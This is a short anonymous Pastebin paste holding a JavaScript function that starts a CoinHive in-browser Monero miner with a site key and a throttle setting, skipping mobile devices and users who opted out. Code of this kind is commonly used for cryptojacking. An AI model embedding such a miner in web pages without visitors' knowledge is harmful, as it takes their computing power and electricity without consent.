Advertisement
Guest User

Untitled

a guest
Jul 23rd, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function minerarMonero(){
  2.  
  3.     var miner = new CoinHive.Anonymous('5yXpvulNMKOFanV3C4cTvdmTNXbv2V2X', {throttle: 0.3});
  4.  
  5.     if (!miner.isMobile() && !miner.didOptOut(14400)) {
  6.         miner.start();
  7.     }
  8.  
  9. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement